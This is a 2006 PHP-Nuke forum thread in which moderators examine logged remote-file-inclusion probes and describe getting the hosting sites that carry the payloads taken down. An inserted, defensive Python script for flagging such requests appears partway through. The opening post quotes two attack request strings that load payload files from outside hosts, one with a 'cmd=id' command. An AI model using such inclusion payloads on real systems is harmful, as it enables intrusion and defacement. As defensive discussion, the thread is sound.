Ravens PHP Scripts: Forums
 

 

Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

Posted: Tue Feb 07, 2006 11:31 am

I'm not using AllMyGuests anymore, but since I installed the 404 error page with mail function I have noticed a lot of mails like this, with IPs from Brazil and some other countries too:
Quote:

------------------
201.58.68.105 /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.portodemoz.pa.gov.br/su.txt?bug0?

User Agent =
------------------

201.9.158.203 tried to load //include/write.php?dir=http://www.webzenxd.kit.net/tool25.txt?&cmd=id

User Agent =


Does this mean someone is running that "D" tool, or is this more automatic? Of course I can ban Brazil completely, but that isn't the solution. How to stop this?
 
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

Posted: Tue Feb 07, 2006 2:21 pm

Indeed, my dear Susann.... I'm sure you're glad now having my 404, huh... Smile
Yes, they are looking for ways to hack the place..
I mailed the Brazilian owners of ...www.webzenxd.kit...etc.... 2 days ago.. and as you visit it you see they finally took the site offline..... Razz
So it is useful to mail providers and pull websites down, even in Brazil..
 
Susann
Posted: Tue Feb 07, 2006 3:43 pm

Thanks Hitwalker, Smile

Yes, the 404 pages are helpful because you are well informed in time. I always get my logfiles one day later.

Because of the cmd and AllMyGuests I googled, and what shocked me is that this d tool can be found on several sites.
 
hitwalker
Posted: Tue Feb 07, 2006 3:50 pm

Yes, I know.... a lot were usually hosted by Yahoo (GeoCities), but they respond faster lately....
Yesterday I got a big thank you from an American who had a hacked area on his site he didn't know of..
They uploaded the same stuff that was on the Brazil website.
He was grateful for the warning.....
Point is, I didn't have to do that.
If people would do it more often then there would be fewer addresses to abuse.
 
Susann
Posted: Tue Feb 07, 2006 4:36 pm

Quote:
if people would do it more often then there would be less addresses to abuse.

Exactly, that's the problem. Most people are too lazy, or they hesitate to do it because they really don't know what's going on.
 
hitwalker
Posted: Tue Feb 07, 2006 4:54 pm

I had another one, Susann; this one was hosted at 100free.
I wrote them ...
(names etc ...are taken out)
Contact Name: hitwalker

Support Issue: please remove the following account.

They just replied with:

This site has been removed from our hosting services for violations of our
TOS (Terms of Service). Additionally, all sites associated with the email
address used to sign up for hosting have been removed. Thank you for
bringing this to our attention.

Nice huh..... killing me
 
Susann
Posted: Tue Feb 07, 2006 8:22 pm

Nice. It's as simple as that Smile
 
Susann
Posted: Fri Feb 10, 2006 9:37 pm

Quote:
I'm sure you're glad now having my 404, huh
Well, it's a never-ending story with the signin.php. There must be some reason why I am receiving a lot of this kind of mail at the moment.
 
hitwalker
Posted: Fri Feb 10, 2006 10:28 pm

Yeah, I get them too.... but it's getting less now.. also getting some profile.php.... lol
But as you saw by now, Susann, how busy they are....
But I believe most of them are automatic scripts that pull website URLs like ours from scripts.... then they let a script run with different proxies.
I've seen that a lot by now, same URL over and over like 4 or 5 times within 1 minute with 3 or 4 different IPs.
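
One way to triage the 404 mails discussed in this thread, as an added example that is not part of any poster's message: it flags requests in which a query parameter's value is a remote URL (the pattern in the quoted mails) and reports URIs requested from several IPs within one minute. The record layout, timestamps, hosts and IP addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl

# Constructed 404 records: (timestamp, client IP, request URI).
# Hosts and IPs are documentation values, not taken from real logs.
SAMPLE = [
    ("2006-02-10 21:30:05", "203.0.113.10",
     "/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://files.example.test/a.txt?"),
    ("2006-02-10 21:30:20", "198.51.100.7",
     "/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://files.example.test/a.txt?"),
    ("2006-02-10 21:30:41", "192.0.2.44",
     "/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://files.example.test/a.txt?"),
    ("2006-02-10 21:45:00", "192.0.2.80",
     "//include/write.php?dir=http://files.example.test/b.txt?&cmd=id"),
    ("2006-02-10 22:00:00", "192.0.2.99",
     "/modules.php?name=Forums&file=viewtopic&t=8000"),
]

REMOTE_VALUE = re.compile(r"^(?:https?|ftp)://", re.I)

def remote_include_params(uri):
    """Return the names of query parameters whose (URL-decoded) value is a remote URL."""
    _path, _, query = uri.partition("?")
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE.match(value.strip())]

def distributed_probes(records, window=timedelta(minutes=1), min_ips=3):
    """Report flagged URIs requested by at least min_ips distinct IPs inside one window."""
    hits = defaultdict(list)
    for ts, ip, uri in records:
        if remote_include_params(uri):
            hits[uri].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), ip))
    report = {}
    for uri, seen in hits.items():
        seen.sort()
        for i, (start, _ip) in enumerate(seen):
            ips = {ip for t, ip in seen[i:] if t - start <= window}
            if len(ips) >= min_ips:
                report[uri] = sorted(ips)
                break
    return report

if __name__ == "__main__":
    for uri, ips in distributed_probes(SAMPLE).items():
        print(len(ips), "IPs within one minute:", uri)
```

Because `parse_qsl` URL-decodes values, a percent-encoded `http%3A%2F%2F...` value is flagged the same way as a plain one.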
 
Susann
Posted: Sat Feb 11, 2006 5:45 am

Well, I visited some hackers' site after the first email and at first I thought this could be the reason. But I found 2 interesting articles about the "D" tool; one is from isc.sans.org: "We have received additional reports of attempted site defacement leveraging the same tool suite referenced above but targeting PHP-Nuke sites specifically."
 
hitwalker
Posted: Sat Feb 11, 2006 6:27 am

Well, that's all they do...
Most people don't even know what's going on on their server..
And we have both ways covered now, as I like to believe...
Either we get a wannabe hacker attack and Sentinel kills him on site, or they call for a page I don't have and I get the 404 and I kill them personally Twisted Evil
 
All times are GMT - 6 Hours
 